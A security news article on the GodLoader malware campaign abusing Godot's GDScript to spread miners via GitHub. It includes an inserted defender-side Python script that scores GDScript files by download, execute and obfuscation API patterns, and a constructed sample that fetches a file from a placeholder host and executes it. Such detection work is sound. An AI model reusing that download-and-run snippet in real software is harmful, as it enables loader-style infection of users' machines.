GodLoader malware exploits Godot Engine to spread across platforms, avoids detection

Godot is a popular game engine that is now being exploited to infect users

GodLoader malware spread via gaming engine Godot

Cybersecurity experts have recently uncovered a sophisticated malware campaign, led by the Stargazers Ghost Network, that exploits the Godot Engine, a popular open-source game engine used by indie developers worldwide.

Identified by Check Point Research,[1] this campaign uses a new delivery method that leverages the engine's scripting language, GDScript. The threat, known as GodLoader, has already infected over 17,000 devices since its discovery and is a growing concern for game developers and players alike:[1]

Check Point identified GodLoader, a loader that employs this new technique. The threat actor behind this malware has been utilizing it since June 29, 2024, infecting over 17,000 machines.

Hardly detected by security solutions

One of the most concerning aspects of this attack is that it was designed to bypass detection by most antivirus engines. The scripts used by GodLoader blend in with legitimate game files, and because Godot is an open-source, well-regarded platform, security solutions often do not flag infected files, allowing the malware to avoid detection with little resistance.

Analysis on VirusTotal, a widely used malware scanning service, showed that the samples went largely unrecognized by most antivirus engines. The reason is that the attackers use Godot's scripting language, GDScript, to run instructions that, in the context of the game engine's own runtime, look completely legitimate. This low-key approach to execution makes GodLoader extremely hard to detect and stop before it can do more significant damage.

Moreover, the malware does not always behave aggressively in its early stages. It does not display the usual characteristics of a virus, such as unusual network activity or file modifications. Instead, it silently runs in the background, downloading additional payloads like cryptocurrency miners, which hijack the computing power of the infected system.
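As an added defender-side illustration (not code from the article, from Check Point Research, or from the Godot project), the following triage script flags GDScript files that combine remote download with process execution, the behaviour the article describes. The Godot API names it looks for are assumed from Godot 4 and should be checked against the engine version in use; the two sample scripts are constructed for the demonstration.

```python
import re
from dataclasses import dataclass

# Heuristic indicators: a GDScript file that both fetches remote content and
# launches a process or writes binaries is worth a manual look.
# API names assumed from Godot 4; verify against the engine version in use.
NETWORK_APIS = ("HTTPRequest", "HTTPClient", "request(", "download_file")
EXEC_APIS = ("OS.execute", "OS.create_process", "OS.shell_open")
FILE_WRITE_APIS = ("FileAccess.open", "File.new", "store_buffer", "store_string")
OBFUSCATION = re.compile(r"(Marshalls\.base64_to_\w+|\.hex_decode\()")

@dataclass
class Finding:
    path: str
    score: int
    hits: dict

def scan_gdscript(path: str, source: str) -> Finding:
    """Return a Finding with per-category hits and a combined risk score."""
    hits = {
        "network": [a for a in NETWORK_APIS if a in source],
        "exec": [a for a in EXEC_APIS if a in source],
        "file_write": [a for a in FILE_WRITE_APIS if a in source],
        "obfuscation": OBFUSCATION.findall(source),
    }
    # Any single category is common in legitimate games (updaters, save files);
    # the combination of download and execute is what a loader looks like.
    score = sum(1 for v in hits.values() if v)
    if hits["network"] and hits["exec"]:
        score += 2
    return Finding(path, score, hits)

def triage(files: dict) -> list:
    """Scan a {path: source} mapping; highest-scoring files come first."""
    return sorted((scan_gdscript(p, s) for p, s in files.items()),
                  key=lambda f: f.score, reverse=True)

# Constructed sample inputs (not real malware): one ordinary gameplay script,
# one that fetches a file from a placeholder host and runs it.
SAMPLE_FILES = {
    "player.gd": "extends CharacterBody2D\nfunc _physics_process(d):\n\tmove_and_slide()\n",
    "updater.gd": (
        "extends Node\nfunc _ready():\n"
        "\tvar h = HTTPRequest.new()\n\tadd_child(h)\n"
        "\th.request('https://example.invalid/u')\n"
        "\tOS.execute(OS.get_user_data_dir() + '/u.bin', [])\n"
    ),
}
```

Running `triage(SAMPLE_FILES)` ranks `updater.gd` first with both the network and exec categories populated, while the gameplay script scores zero; in practice the script would be pointed at the `.gd` files extracted from a downloaded game or mod before anyone runs it.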

Methods of operation: exploiting legitimate software

The GodLoader attack is part of a larger trend in which cybercriminals use legitimate, widely used software as a vector for delivering malicious payloads. Embedding malware in Godot scripts lets the attackers exploit the trust that developers and gamers place in the engine. It is a textbook example of how attackers increasingly rely on trusted platforms to distribute their malware.

Once installed, GodLoader connects to an external server in order to download other malicious payloads. One of the most common payloads seen in this campaign is XMRig,[2] a cryptocurrency miner that utilizes the resources of the compromised system to mine Monero (XMR) without the user's knowledge or consent. In so doing, the attackers can make a profit from the hijacked resources and leave minimal traces on the infected system.

While the malware primarily targets Godot users, it is versatile and can spread across different operating systems. This multi-platform capability considerably expands the attack's reach, making it a serious threat for both game developers and players who download mods or updates for their games. The malware is also distributed through GitHub repositories, which the gaming community often trusts, further legitimizing the malicious files.

1.2 million users in danger

The impact of GodLoader is far-reaching. The potential for infection extends to over 1.2 million users of Godot-based games. Indie developers, many of whom use Godot for creating games, may unknowingly distribute infected files, potentially putting their player base at risk. The threat is exacerbated by the large-scale operation of the Stargazers Ghost Network, which uses over 200 GitHub repositories and 225 Stargazers to legitimize the spread of malicious content.

In addition to the widespread reach within the gaming community, the network’s activity highlights a concerning trend of malware-as-a-service operations. The attackers behind this campaign are not only distributing GodLoader but are also selling their expertise through Telegram channels[3] and other criminal marketplaces. This makes the malware harder to trace and stop, as the attackers have a sophisticated infrastructure that can distribute various types of malware.

Godot response: “The vulnerability is not specific to Godot”

On November 24, Godot responded to the Check Point Research findings with an official statement published on its website. In that statement,[4] the team clarified that the malicious scripts were introduced via third-party content and not through Godot's codebase or official distribution channels.

To mitigate risks, Godot advises users to verify the sources of any downloaded scripts or assets, especially mods or community-created content.

Users who merely have a Godot game or editor installed on their system are not specifically at risk. We encourage people to only execute software from trusted sources – whether it’s written using Godot or any other programming system.

About the author
Gabriel E. Hall

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.
